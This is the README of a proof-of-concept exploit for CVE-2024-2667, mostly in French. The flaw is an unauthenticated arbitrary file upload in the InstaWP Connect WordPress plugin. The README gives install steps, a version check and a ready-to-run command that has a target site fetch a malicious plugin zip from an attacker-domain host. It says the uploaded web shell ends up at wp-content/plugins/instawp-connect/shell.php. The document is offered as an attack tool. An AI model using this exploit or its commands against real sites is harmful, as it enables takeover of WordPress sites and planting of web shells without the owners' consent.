CVE-2024-2667-Poc 🚀
Description
Le plugin InstaWP Connect – 1-click WP Staging & Migration pour WordPress est vulnérable à un téléchargement arbitraire de fichiers en raison d'une validation insuffisante des fichiers dans le point de terminaison d'API REST /wp-json/instawp-connect/v1/config dans toutes les versions jusqu'à la version 0.1.0.22 incluse. Cela permet à des attaquants non authentifiés de télécharger des fichiers arbitraires.
Guide d'utilisation du script ⚙️
Installer les prérequis
| Description | Détails | Icône |
|---|
| Installer les bibliothèques requises | Utilisez pip pour installer les bibliothèques Python nécessaires : requests et beautifulsoup4. | 🛠️ |
| Commande d'installation | Exécutez : pip install requests beautifulsoup4. | 📥 |
Exécuter le script
| Description | Détails | Icône |
|---|
| Exécuter le script | Lancez le script en ligne de commande avec les arguments requis. | 🚀 |
| Arguments requis | - -up : URL du plugin (ex. : http://attacker-domain/malicious-plugin.zip). | |
| - -u : URL du site WordPress cible (ex. : http://victim-domain/). | 🔧 |
| Exemple de commande | python CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/ | 📜 |
Vérifier la vulnérabilité
| Description | Détails | Icône |
|---|
| Vérification de la version | Le script examine le fichier readme.txt pour déterminer la version du plugin cible. | 🔍 |
| Version vulnérable | Si la version est <= 0.1.0.22, le script affiche : The site is vulnerable. | ⚠️ |
| Version sûre | Si la version est > 0.1.0.22, le script affiche : The site is not vulnerable. | ✅ |
Emplacement du shell
| Description | Détails | Icône |
|---|
| Chemin du shell | Si le téléchargement réussit, le shell sera accessible à : | 🐚 |
| wp-content/plugins/instawp-connect/shell.php. | |
usage -help
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
options:
-h, --help show this help message and exit
-up URL_PLUGIN, --url_plugin URL_PLUGIN
URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
-u URL_TARGET, --url_target URL_TARGET
URL of the target WordPress site (e.g., http://victim-domain/).